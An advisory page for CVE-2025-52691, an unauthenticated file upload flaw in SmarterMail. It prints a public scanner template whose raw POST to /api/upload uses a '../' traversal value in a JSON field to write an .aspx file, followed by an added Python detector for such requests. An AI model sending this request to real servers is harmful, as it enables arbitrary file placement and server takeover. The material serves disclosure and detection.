CVE-2025-52691: SmarterMail - Unrestricted File Upload

Date: 2026-01-09 | Affected software: SmarterMail | PoC: public

Vulnerability description

SmarterMail contains an unrestricted file upload vulnerability that allows unauthenticated attackers to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.

PoC code [public]

id: CVE-2025-52691

info:
  name: SmarterMail - Unrestricted File Upload
  author: DhiyaneshDK,watchTowr
  severity: critical
  description: |
    Mail server contains an unrestricted file upload vulnerability allowing unauthenticated attackers to upload arbitrary files to any location, potentially enabling remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  remediation: |
    Update to the latest version of the mail server.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2025,smartermail,file-upload,intrusive,rce

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'
  file_name: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /api/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="context"

        attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableIdentifier"

        fakeID
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableFilename"

        {{file_name}}.aspx
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="contextData"

        {"guid":"dag/../../{{rand_string}}"}
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="whatever"; filename="{{file_name}}.jpg"

        Detection Artifact Generator
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fileName":'
          - '{"key":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022009ff7129e92b0a9f83ff9eacf0f4a19cb7239dcb938444a1f6430738f91b738202206763eb41fb516cf003cc9a0b1e4dfe7089c466759459802eaad2d9209a318312:922c64590222798bb761d5b6d8e72950
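
A defender-side check built from the request shape in the template above, as an added example (not part of the original page, the template authors' work, or SmarterMail's code): it parses a captured `POST /api/upload` body and flags a `contextData` `guid` that carries path components and a `resumableFilename` with a server-executable extension. The function names, the extension list and the sample values are assumptions, and a legitimate `guid` is assumed to be a bare identifier.

```python
import email
import json

UPLOAD_PATH = "/api/upload"                        # endpoint from the template's request
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asp")  # assumption: server-executed types

def parse_form(content_type, body):
    """Return {field name: text value} for a multipart/form-data body."""
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    fields = {}
    for part in msg.get_payload() if msg.is_multipart() else []:
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        fields[name] = data.decode("utf-8", "replace").strip()
    return fields

def inspect_upload(method, path, content_type, body):
    """Return findings for one HTTP request (empty list = nothing flagged)."""
    if method.upper() != "POST" or path.split("?")[0].rstrip("/").lower() != UPLOAD_PATH:
        return []
    fields = parse_form(content_type, body)
    findings = []
    try:
        guid = json.loads(fields.get("contextData", "{}")).get("guid", "")
    except (ValueError, AttributeError):
        guid = ""
        findings.append("contextData is not a JSON object")
    segments = str(guid).replace("\\", "/").split("/")  # assumption: bare id expected
    if ".." in segments or len(segments) > 1 or ":" in str(guid):
        findings.append("guid contains path components")
    if fields.get("resumableFilename", "").lower().endswith(SCRIPT_EXTS):
        findings.append("resumableFilename has a server-executable extension")
    return findings

def sample_body(boundary, guid, filename):
    """Constructed sample: the same form fields the template sends."""
    form = {"context": "attachment", "resumableIdentifier": "fakeID",
            "resumableFilename": filename, "contextData": json.dumps({"guid": guid})}
    out = "".join(f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
                  for k, v in form.items())
    out += (f'--{boundary}\r\nContent-Disposition: form-data; name="file"; '
            f'filename="x.jpg"\r\n\r\nsample\r\n--{boundary}--\r\n')
    return out.encode()

if __name__ == "__main__":
    ctype = "multipart/form-data; boundary=----sampleBoundary"
    for guid, fn in [("dag/../../abcdef", "abcdef.aspx"), ("0f8fad5bd9cb469f", "report.pdf")]:
        print(inspect_upload("POST", UPLOAD_PATH, ctype, sample_body("----sampleBoundary", guid, fn)))
```

The check needs the request body, so it fits a reverse proxy, WAF hook or packet capture rather than standard access logs, which record only the request line.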
